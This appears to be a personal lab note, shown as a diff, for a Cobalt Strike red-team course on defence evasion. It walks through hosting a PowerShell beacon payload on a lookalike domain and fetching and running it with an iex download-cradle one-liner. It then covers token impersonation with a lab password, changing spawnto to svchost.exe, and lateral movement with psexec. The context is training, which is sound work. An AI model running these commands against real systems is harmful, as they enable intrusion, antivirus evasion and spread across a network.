adot8/obsidian-notes/Red Teaming/Cobalt Strike Assumed Breach/15. Defence Evasion/Lab.md

     1. sudo /usr/bin/docker restart cobaltstrike-cs-1

     > If the container fails to restart properly use sudo /usr/bin/docker logs cobaltstrike-cs-1 to see the profile errors.

+# Testing

+1. Build new payloads

+    1. Go to **Payloads > Windows Stageless Generate All Payloads**
+    2. Folder: C:\Payloads
+2. Host a 64-bit PowerShell payload.

+    1. Go to **Site Management > Host File**
+    2. File: _C:\Payloads\http_x64.ps1_
+    3. Local URI: /test
+    4. Local Host: www.bleepincomputer.com
+3. Switch to [Workstation 1](https://labclient.labondemand.com/Instructions/315c5b32-3074-4897-8a78-eb9f1005d587?showWhenStarting=1#) and login with Passw0rd!.

+4. Open a PowerShell window.

+5. Verify that Defender's Real-Time Protection is enabled.

+    1. (Get-MpPreference).DisableRealtimeMonitoring

+    > DisableRealtimeMonitoring should return as False.

+6. Download and invoke the PowerShell payload.

+    powershellTypeCopy

+    `iex (new-object net.webclient).downloadstring("http://www.bleepincomputer.com/test")`

+7. Switch back to [Attacker Desktop](https://labclient.labondemand.com/Instructions/315c5b32-3074-4897-8a78-eb9f1005d587?showWhenStarting=1#) and a new Beacon should be checking in.

+8. From the new Beacon, impersonate a local admin to _lon-ws-1_.

+    1. make_token CONTOSO\rsteel Passw0rd!
+9. Verify that Defender's Real-Time Protection is enabled on the target.

+    1. remote-exec winrm lon-ws-1 (Get-MpPreference).DisableRealtimeMonitoring
+10. Change the spawnto for the service payload.

+    1. ak-settings spawnto_x64 C:\Windows\System32\svchost.exe
+11. Move laterally to _lon-ws-1_.

+    1. jump psexec64 lon-ws-1 smb